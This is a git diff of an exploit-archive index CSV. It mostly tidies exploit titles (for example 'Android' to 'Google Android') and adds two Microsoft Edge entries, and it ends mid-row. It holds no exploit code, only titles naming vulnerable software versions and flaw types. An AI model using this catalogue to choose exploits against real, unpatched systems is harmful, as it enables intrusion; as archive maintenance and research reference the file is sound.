diff --git a/files.csv b/files.csv index 3f3d19e4d..b1cb62ae9 100644 --- a/files.csv +++ b/files.csv @@ -170,7 +170,7 @@ id,file,description,date,author,platform,type,port 978,platforms/windows/dos/978.cpp,"Ashley's Web Server - Denial of Service",2005-05-04,basher13,windows,dos,0 983,platforms/windows/dos/983.cpp,"DataTrac Activity Console - Denial of Service",2005-05-06,basher13,windows,dos,0 984,platforms/multiple/dos/984.c,"Ethereal 0.10.10 - (dissect_ipc_state) Remote Denial of Service",2005-05-07,Nicob,multiple,dos,0 -40381,platforms/android/dos/40381.txt,"Android - getpidcon Usage binder Service Replacement Race Condition",2016-09-14,"Google Security Research",android,dos,0 +40381,platforms/android/dos/40381.txt,"Google Android - getpidcon Usage binder Service Replacement Race Condition",2016-09-14,"Google Security Research",android,dos,0 988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service",2005-05-08,basher13,windows,dos,0 998,platforms/linux/dos/998.c,"Linux Kernel 2.6.12-rc4 - 'ioctl_by_bdev' Local Denial of Service",2005-05-17,alert7,linux,dos,0 999,platforms/linux/dos/999.c,"Gaim 1.2.1 - URL Handling Remote Stack Overflow",2005-05-17,Ron,linux,dos,0 @@ -312,7 +312,7 @@ id,file,description,date,author,platform,type,port 1641,platforms/linux/dos/1641.pl,"Libxine 1.14 - MPEG Stream Buffer Overflow (PoC)",2006-04-04,"Federico L. Bossi Bonin",linux,dos,0 1642,platforms/windows/dos/1642.c,"Ultr@VNC 1.0.1 - VNCLog::ReallyPrint Remote Buffer Overflow (PoC)",2006-04-04,"Luigi Auriemma",windows,dos,0 1643,platforms/windows/dos/1643.c,"Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow (PoC)",2006-04-04,"Luigi Auriemma",windows,dos,0 -1651,platforms/php/dos/1651.php,"ADODB < 4.70 - (tmssql.php) Denial of Service",2006-04-09,rgod,php,dos,0 +1651,platforms/php/dos/1651.php,"ADODB < 4.70 - 'tmssql.php' Denial of Service",2006-04-09,rgod,php,dos,0 1657,platforms/linux/dos/1657.asm,"Linux Kernel 2.6.x - 'sys_timer_create()' Local Denial of Service",2006-04-09,fingerout,linux,dos,0 1667,platforms/multiple/dos/1667.html,"Mozilla Firefox 1.5.0.1 / Camino 1.0 - Null Pointer Dereference Crash",2006-04-13,BuHa,multiple,dos,0 1671,platforms/multiple/dos/1671.c,"panic-reloaded - TCP Denial of Service Tool",2006-04-13,hash,multiple,dos,0 @@ -1315,15 +1315,15 @@ id,file,description,date,author,platform,type,port 10960,platforms/multiple/dos/10960.pl,"Google Chrome 4.0.249.30 - Denial of Service (PoC)",2010-01-03,anonymous,multiple,dos,0 11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS And AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos,0 11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0 -11021,platforms/windows/dos/11021.txt,"FlashGet 3.x - IEHelper Remote Exec (PoC)",2010-01-06,superli,windows,dos,0 +11021,platforms/windows/dos/11021.txt,"FlashGet 3.x - IEHelper Remote Execution (PoC)",2010-01-06,superli,windows,dos,0 11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - Buffer Overflow (PoC)",2010-01-06,s4squatch,windows,dos,0 11043,platforms/hardware/dos/11043.txt,"Total MultiMedia Features - Denial of Service PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0 11044,platforms/linux/dos/11044.txt,"Gnome Panel 2.28.0 - Denial of Service (PoC)",2010-01-06,"Pietro Oliva",linux,dos,0 11052,platforms/windows/dos/11052.pl,"Kantaris 0.5.6 - Local Denial of Service (PoC)",2010-01-07,anonymous,windows,dos,0 11053,platforms/windows/dos/11053.py,"ttplayer 5.6Beta3 - Denial of Service (PoC)",2010-01-07,"t-bag YDteam",windows,dos,0 -11062,platforms/windows/dos/11062.txt,"SopCast SopCore Control ActiveX - Remote Exec (PoC)",2010-01-08,superli,windows,dos,0 -11064,platforms/windows/dos/11064.txt,"UUSee ReliPlayer ActiveX - Remote Exec (PoC)",2010-01-08,superli,windows,dos,0 -11065,platforms/windows/dos/11065.html,"SPlayer XvidDecoder 3.3 - ActiveX Remote Exec (PoC)",2010-01-08,superli,windows,dos,0 +11062,platforms/windows/dos/11062.txt,"SopCast SopCore Control ActiveX - Remote Execution (PoC)",2010-01-08,superli,windows,dos,0 +11064,platforms/windows/dos/11064.txt,"UUSee ReliPlayer ActiveX - Remote Execution (PoC)",2010-01-08,superli,windows,dos,0 +11065,platforms/windows/dos/11065.html,"SPlayer XvidDecoder 3.3 - ActiveX Remote Execution (PoC)",2010-01-08,superli,windows,dos,0 11070,platforms/windows/dos/11070.txt,"Microsoft Windows Live Messenger 2009 - ActiveX Denial of Service",2010-01-08,"HACKATTACK IT SECURITY GmbH",windows,dos,0 11084,platforms/windows/dos/11084.pl,"Real Player - Local Crash (PoC)",2010-01-10,"D3V!L FUCKER",windows,dos,0 11095,platforms/windows/dos/11095.txt,"YPOPS! 0.9.7.3 - Buffer Overflow (SEH)",2010-01-10,blake,windows,dos,0 @@ -1340,7 +1340,7 @@ id,file,description,date,author,platform,type,port 11149,platforms/windows/dos/11149.c,"Sub Station Alpha 4.08 - '.rt' Local Buffer Overflow (PoC)",2010-01-15,"fl0 fl0w",windows,dos,0 11150,platforms/windows/dos/11150.txt,"Aqua Real 1.0 / 2.0 - Local Crash (PoC)",2010-01-15,R3d-D3V!L,windows,dos,0 11165,platforms/windows/dos/11165.pl,"MediaMonkey Player - Local Denial of Service",2010-01-17,Red-D3v1L,windows,dos,0 -11176,platforms/windows/dos/11176.txt,"Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Exec (PoC)",2010-01-17,superli,windows,dos,0 +11176,platforms/windows/dos/11176.txt,"Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,dos,0 11180,platforms/windows/dos/11180.pl,"Muziic Player 2.0 - '.mp3' Local Denial of Service",2010-01-18,Red-D3v1L,windows,dos,0 11182,platforms/windows/dos/11182.txt,"Microsoft Internet Explorer 6/7/8 - Denial of Service (Shockwave Flash Object)",2010-01-18,"Mert SARICA",windows,dos,0 11190,platforms/windows/dos/11190.txt,"AOL 9.5 - ActiveX Heap Overflow",2010-01-19,"Hellcode Research",windows,dos,0 @@ -2027,7 +2027,7 @@ id,file,description,date,author,platform,type,port 17843,platforms/windows/dos/17843.txt,"Rockwell RSLogix 19 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 17844,platforms/windows/dos/17844.txt,"Measuresoft ScadaPro 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 17856,platforms/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflow (Denial of Service PoC)",2011-09-18,loneferret,windows,dos,21 -17878,platforms/windows/dos/17878.txt,"EViews 7.0.0.1 - (aka 7.2) Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 +17878,platforms/windows/dos/17878.txt,"EViews 7.0.0.1 (aka 7.2) - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 17879,platforms/windows/dos/17879.txt,"MetaServer RT 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 17885,platforms/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos,0 17889,platforms/windows/dos/17889.txt,"Sterling Trader 7.0.2 - Integer Overflow",2011-09-26,"Luigi Auriemma",windows,dos,0 @@ -2992,7 +2992,7 @@ id,file,description,date,author,platform,type,port 23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,windows,dos,0 23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service",2003-10-15,"Oliver Karow",linux,dos,0 23246,platforms/windows/dos/23246.txt,"SumatraPDF 2.1.1/MuPDF 1.0 - Integer Overflow",2012-12-09,beford,windows,dos,0 -23248,platforms/android/dos/23248.txt,"Android Kernel 2.6 - Local Denial of Service Crash (PoC)",2012-12-09,G13,android,dos,0 +23248,platforms/android/dos/23248.txt,"Google Android Kernel 2.6 - Local Denial of Service Crash (PoC)",2012-12-09,G13,android,dos,0 23254,platforms/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 - Denial of Service",2012-12-09,"High-Tech Bridge SA",windows,dos,0 23263,platforms/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF - Malformed Server Name Heap Corruption",2003-10-20,@stake,multiple,dos,0 23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur MailServer 3.3/4.0/4.2 - IMAP AUTH Remote Buffer Overflow",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0 @@ -3966,7 +3966,7 @@ id,file,description,date,author,platform,type,port 31444,platforms/linux/dos/31444.txt,"MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial of Service",2007-12-05,"Masaaki HIROSE",linux,dos,0 31478,platforms/hardware/dos/31478.txt,"Linksys SPA-2102 Phone Adapter Packet Handling - Denial of Service",2008-03-24,sipherr,hardware,dos,0 31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash (PoC)",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80 -31542,platforms/multiple/dos/31542.txt,"IBM solidDB 6.0.10 - (Format String and Denial of Service) Multiple Vulnerabilities",2008-03-26,"Luigi Auriemma",multiple,dos,0 +31542,platforms/multiple/dos/31542.txt,"IBM solidDB 6.0.10 - Format String / Denial of Service",2008-03-26,"Luigi Auriemma",multiple,dos,0 31984,platforms/linux/dos/31984.txt,"Mozilla Firefox 3.0 - Malformed JPEG File Denial of Service",2008-06-27,"Beenu Arora",linux,dos,0 31550,platforms/bsd/dos/31550.c,"Multiple BSD Platforms - 'strfmon()' Function Integer Overflow",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0 31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 @@ -4320,7 +4320,7 @@ id,file,description,date,author,platform,type,port 34306,platforms/hardware/dos/34306.txt,"SHARP MX Series - Denial of Service",2014-08-09,pws,hardware,dos,23 34307,platforms/hardware/dos/34307.txt,"Sky Broadband Router SR101 - Weak WPA-PSK Generation Algorithm",2014-08-09,"Matt O'Connor",hardware,dos,0 34309,platforms/solaris/dos/34309.txt,"Oracle Solaris - 'rdist' Privilege Escalation",2010-07-13,"Monarch Rich",solaris,dos,0 -34348,platforms/linux/dos/34348.txt,"OpenLDAP 2.4.22 - ('modrdn' Request) Multiple Vulnerabilities",2010-07-19,"Ilkka Mattila",linux,dos,0 +34348,platforms/linux/dos/34348.txt,"OpenLDAP 2.4.22 - 'modrdn' Request Multiple Vulnerabilities",2010-07-19,"Ilkka Mattila",linux,dos,0 34355,platforms/windows/dos/34355.txt,"Microsoft DirectX 8/9 DirectPlay - Multiple Denial of Service Vulnerabilities",2010-07-18,"Luigi Auriemma",windows,dos,0 34356,platforms/linux/dos/34356.txt,"gif2png 2.5.2 - Remote Buffer Overflow",2009-12-12,"Razuel Akaharnath",linux,dos,0 34359,platforms/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 - Cross-Site Request Forgery",2010-07-20,anonymous,windows,dos,0 @@ -4721,7 +4721,7 @@ id,file,description,date,author,platform,type,port 38240,platforms/windows/dos/38240.py,"Wireshark 1.12.7 - Division by Zero Crash (PoC)",2015-09-18,spyk,windows,dos,0 38249,platforms/multiple/dos/38249.txt,"MiniUPnP 1.4 - Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0 38259,platforms/windows/dos/38259.py,"MASM32 11R - Crash (PoC)",2015-09-22,VIKRAMADITYA,windows,dos,0 -38262,platforms/osx/dos/38262.txt,"Apple Mac OSX Regex Engine (TRE) - (Integer Signedness and Overflow) Multiple Vulnerabilities",2015-09-22,"Google Security Research",osx,dos,0 +38262,platforms/osx/dos/38262.txt,"Apple Mac OSX Regex Engine (TRE) - Integer Signedness / Overflow",2015-09-22,"Google Security Research",osx,dos,0 38263,platforms/osx/dos/38263.txt,"Apple Mac OSX Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos,0 38264,platforms/osx/dos/38264.txt,"Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow",2015-09-22,"Google Security Research",osx,dos,0 38265,platforms/win_x86/dos/38265.txt,"Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)",2015-09-22,"Nils Sommer",win_x86,dos,0 @@ -5072,15 +5072,15 @@ id,file,description,date,author,platform,type,port 39648,platforms/windows/dos/39648.txt,"Microsoft Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0 39649,platforms/multiple/dos/39649.txt,"Adobe Flash - URLStream.readObject Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 39650,platforms/multiple/dos/39650.txt,"Adobe Flash - textfield.maxChars Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 -39651,platforms/android/dos/39651.txt,"Android - ih264d_process_intra_mb Memory Corruption",2016-04-01,"Google Security Research",android,dos,0 +39651,platforms/android/dos/39651.txt,"Google Android - 'ih264d_process_intra_mb' Memory Corruption",2016-04-01,"Google Security Research",android,dos,0 39652,platforms/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 39653,platforms/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos,0 39654,platforms/windows/dos/39654.pl,"Xion Audio Player 1.5 (build 160) - '.mp3' Crash (PoC)",2016-04-04,"Charley Celice",windows,dos,0 39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0 39663,platforms/windows/dos/39663.html,"Microsoft Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0 39669,platforms/linux/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",linux,dos,0 -39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0 -39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0 +39685,platforms/android/dos/39685.txt,"Google Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0 +39686,platforms/android/dos/39686.txt,"Google Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0 39699,platforms/windows/dos/39699.html,"Microsoft Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-Free",2016-04-15,"Marcin Ressel",windows,dos,0 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard-Coded Credentials",2016-04-18,DLY,hardware,dos,0 39712,platforms/win_x86-64/dos/39712.txt,"Microsoft Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win_x86-64,dos,0 @@ -5110,7 +5110,7 @@ id,file,description,date,author,platform,type,port 39797,platforms/windows/dos/39797.py,"Core FTP Server 32-bit Build 587 - Heap Overflow",2016-05-10,"Paul Purcell",windows,dos,21 39799,platforms/multiple/dos/39799.txt,"Adobe Reader DC 15.010.20060 - Memory Corruption",2016-05-10,"Pier-Luc Maltais",multiple,dos,0 39800,platforms/linux/dos/39800.txt,"Nfdump Nfcapd 1.6.14 - Multiple Vulnerabilities",2016-05-10,Security-Assessment.com,linux,dos,0 -39801,platforms/android/dos/39801.c,"Android Broadcom Wi-Fi Driver - Memory Corruption",2016-05-11,AbdSec,android,dos,0 +39801,platforms/android/dos/39801.c,"Google Android Broadcom Wi-Fi Driver - Memory Corruption",2016-05-11,AbdSec,android,dos,0 39802,platforms/windows/dos/39802.py,"CIScan 1.00 - Hostname/IP Field Overwrite (SEH) (PoC)",2016-05-11,"Nipun Jaswal",windows,dos,0 39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0 39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash (PoC) (2)",2016-05-16,HauntIT,windows,dos,0 @@ -5142,7 +5142,7 @@ id,file,description,date,author,platform,type,port 39906,platforms/multiple/dos/39906.txt,"Microsoft Word (Windows/OSX) - Crash (PoC)",2016-06-09,halsten,multiple,dos,0 39915,platforms/windows/dos/39915.c,"Armadito Antimalware - Backdoor/Bypass",2016-06-10,Ax.,windows,dos,0 39920,platforms/osx/dos/39920.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",osx,dos,0 -39921,platforms/android/dos/39921.txt,"Android - /system/bin/sdcard Stack Buffer Overflow",2016-06-10,"Google Security Research",android,dos,0 +39921,platforms/android/dos/39921.txt,"Google Android - '/system/bin/sdcard' Stack Buffer Overflow",2016-06-10,"Google Security Research",android,dos,0 39922,platforms/osx/dos/39922.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",osx,dos,0 39923,platforms/osx/dos/39923.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in AppleGraphicsDeviceControl",2016-06-10,"Google Security Research",osx,dos,0 39924,platforms/osx/dos/39924.c,"Apple Mac OSX Kernel - Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos,0 @@ -5214,12 +5214,12 @@ id,file,description,date,author,platform,type,port 40321,platforms/php/dos/40321.php,"PHP 7.0 - 'AppendIterator::append' Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0 40439,platforms/windows/dos/40439.py,"VideoLAN VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0 -40449,platforms/android/dos/40449.txt,"Android - Insufficient Binder Message Verification Pointer Leak",2016-10-03,"Google Security Research",android,dos,0 -40502,platforms/android/dos/40502.txt,"Android - 'gpsOneXtra' Data Files Denial of Service",2016-10-11,"Nightwatch Cybersecurity Research",android,dos,0 +40449,platforms/android/dos/40449.txt,"Google Android - Insufficient Binder Message Verification Pointer Leak",2016-10-03,"Google Security Research",android,dos,0 +40502,platforms/android/dos/40502.txt,"Google Android - 'gpsOneXtra' Data Files Denial of Service",2016-10-11,"Nightwatch Cybersecurity Research",android,dos,0 40508,platforms/windows/dos/40508.txt,"Cisco Webex Player T29.10 - '.WRF' Use-After-Free Memory Corruption",2016-10-12,COSIG,windows,dos,0 40509,platforms/windows/dos/40509.txt,"Cisco Webex Player T29.10 - '.ARF' Out-of-Bounds Memory Corruption",2016-10-12,COSIG,windows,dos,0 40510,platforms/multiple/dos/40510.txt,"Adobe Flash Player 23.0.0.162 - '.SWF' ConstantPool Critical Memory Corruption",2016-10-12,COSIG,multiple,dos,0 -40515,platforms/android/dos/40515.txt,"Android - Binder Generic ASLR Leak",2016-10-12,"Google Security Research",android,dos,0 +40515,platforms/android/dos/40515.txt,"Google Android - Binder Generic ASLR Leak",2016-10-12,"Google Security Research",android,dos,0 40524,platforms/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",2016-10-13,"Antonio Z.",osx,dos,0 40536,platforms/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",windows,dos,0 40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",osx,dos,0 @@ -5293,7 +5293,7 @@ id,file,description,date,author,platform,type,port 40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0 40866,platforms/linux/dos/40866.py,"NetCat 0.7.1 - Denial of Service",2016-12-05,n30m1nd,linux,dos,0 40875,platforms/windows/dos/40875.html,"Microsoft Edge - JSON.parse Info Leak",2016-12-06,"Google Security Research",windows,dos,0 -40876,platforms/android/dos/40876.txt,"Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index",2016-12-06,"Google Security Research",android,dos,0 +40876,platforms/android/dos/40876.txt,"Google Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index",2016-12-06,"Google Security Research",android,dos,0 40878,platforms/windows/dos/40878.txt,"Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)",2016-12-06,Skylined,windows,dos,0 40879,platforms/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,windows,dos,0 40880,platforms/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,windows,dos,0 @@ -5319,8 +5319,10 @@ id,file,description,date,author,platform,type,port 40933,platforms/windows/dos/40933.svg,"Microsoft Internet Explorer 9 - IEFRAME CMarkup­Pointer::Move­To­Gap Use-After-Free",2016-12-16,Skylined,windows,dos,0 40935,platforms/windows/dos/40935.html,"Microsoft Internet Explorer 9 - IEFRAME CView::Ensure­Size Use-After-Free (MS13-021)",2016-12-16,Skylined,windows,dos,0 40944,platforms/multiple/dos/40944.py,"Google Chrome < 31.0.1650.48 - HTTP 1xx base::String­Tokenizer­T<...>::Quick­Get­Next Out-of-Bounds Read",2016-12-19,Skylined,multiple,dos,0 -40945,platforms/android/dos/40945.txt,"Google Android - WifiNative::setHotlist Stack Overflow",2016-12-20,"Google Security Research",android,dos,0 +40945,platforms/android/dos/40945.txt,"Google Android - WifiNative::setHotlist Stack Overflow",2016-12-20,"Google Security Research",android,dos,0 40946,platforms/windows/dos/40946.html,"Microsoft Internet Explorer 11 MSHTML - CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)",2016-12-20,Skylined,windows,dos,0 +40947,platforms/windows/dos/40947.html,"Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145)",2016-12-21,"Google Security Research",windows,dos,0 +40948,platforms/windows/dos/40948.html,"Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144)",2016-12-21,"Google Security Research",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -5596,7 +5598,7 @@ id,file,description,date,author,platform,type,port 1402,platforms/sco/local/1402.c,"SCO OpenServer 5.0.7 - (termsh) Privilege Escalation",2006-01-03,prdelka,sco,local,0 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow (1)",2006-01-04,K4P0,windows,local,0 1404,platforms/windows/local/1404.c,"WinRAR 3.30 - Long Filename Buffer Overflow (2)",2006-01-04,c0d3r,windows,local,0 -1406,platforms/windows/local/1406.php,"PHP 4.4.0 - (mysql_connect function) Local Buffer Overflow",2006-01-05,mercenary,windows,local,0 +1406,platforms/windows/local/1406.php,"PHP 4.4.0 - 'mysql_connect function' Local Buffer Overflow",2006-01-05,mercenary,windows,local,0 1407,platforms/windows/local/1407.c,"Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0 1412,platforms/linux/local/1412.rb,"Xmame 0.102 - '-lang' Local Buffer Overflow",2006-01-10,xwings,linux,local,0 1415,platforms/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow (C)",2006-01-13,Qnix,linux,local,0 @@ -6654,7 +6656,7 @@ id,file,description,date,author,platform,type,port 16086,platforms/linux/local/16086.txt,"OpenVAS Manager - Command Injection",2011-01-31,"Tim Brown",linux,local,0 16092,platforms/windows/local/16092.py,"CodeBlocks 8.02 - (cbp) Buffer Overflow",2011-02-01,sup3r,windows,local,0 16098,platforms/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0 -16099,platforms/android/local/16099.c,"Android 1.x/2.x - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0 +16099,platforms/android/local/16099.c,"Google Android 1.x/2.x - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0 16107,platforms/windows/local/16107.py,"AOL Desktop 9.6 - '.rtx' Buffer Overflow",2011-02-03,sickness,windows,local,0 16119,platforms/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit",2011-02-06,kingcope,freebsd,local,0 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0 @@ -8524,7 +8526,7 @@ id,file,description,date,author,platform,type,port 39311,platforms/windows/local/39311.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0 40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306 40774,platforms/linux/local/40774.sh,"Nagios 4.2.2 - Privilege Escalation",2016-11-18,"Vincent Malguy",linux,local,0 -39340,platforms/android/local/39340.cpp,"Android - 'sensord' Privilege Escalation",2016-01-27,s0m3b0dy,android,local,0 +39340,platforms/android/local/39340.cpp,"Google Android - 'sensord' Privilege Escalation",2016-01-27,s0m3b0dy,android,local,0 39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0 39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0 39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0 @@ -8820,7 +8822,7 @@ id,file,description,date,author,platform,type,port 167,platforms/linux/remote/167.c,"Ethereal 0.10.0 < 0.10.2 - IGAP Overflow",2004-03-28,"Abhisek Datta",linux,remote,0 168,platforms/windows/remote/168.c,"RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow",2004-03-28,Sam,windows,remote,0 169,platforms/hardware/remote/169.pl,"Multiple Cisco Products - Cisco Global Exploiter Tool",2004-03-28,blackangels,hardware,remote,0 -171,platforms/linux/remote/171.c,"tcpdump - ISAKMP Identification payload Integer Overflow",2004-04-05,Rapid7,linux,remote,0 +171,platforms/linux/remote/171.c,"tcpdump - ISAKMP Identification Payload Integer Overflow",2004-04-05,Rapid7,linux,remote,0 173,platforms/linux/remote/173.pl,"Monit 4.1 - Buffer Overflow",2004-04-09,gsicht,linux,remote,2812 174,platforms/linux/remote/174.c,"Monit 4.2 - Buffer Overflow",2004-04-12,"Abhisek Datta",linux,remote,2812 175,platforms/windows/remote/175.pl,"eMule 0.42d - IRC Remote Buffer Overflow",2004-04-12,kingcope,windows,remote,0 @@ -9013,7 +9015,7 @@ id,file,description,date,author,platform,type,port 878,platforms/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",linux,remote,0 879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Request Remote Exploit",2005-03-14,lammat,multiple,remote,0 883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,windows,remote,2380 -900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Heap Overflow",2005-03-28,infamous41md,linux,remote,25 +900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Heap Overflow",2005-03-28,infamous41md,linux,remote,25 902,platforms/linux/remote/902.c,"mtftpd 0.0.3 - Remote Code Execution",2005-03-29,darkeagle,linux,remote,21 903,platforms/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - (imapmagicplus) Remote Exploit",2005-03-29,crash-x,linux,remote,143 906,platforms/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)",2005-04-01,class101,windows,remote,20031 @@ -9374,7 +9376,7 @@ id,file,description,date,author,platform,type,port 3636,platforms/windows/remote/3636.txt,"Microsoft Windows - Animated Cursor '.ani' Remote Exploit (eeye patch Bypass)",2007-04-01,jamikazu,windows,remote,0 3650,platforms/windows/remote/3650.c,"Frontbase 4.2.7 - Authenticated Remote Buffer Overflow (2.2)",2007-04-02,Heretic2,windows,remote,0 3651,platforms/windows/remote/3651.txt,"Microsoft Windows - 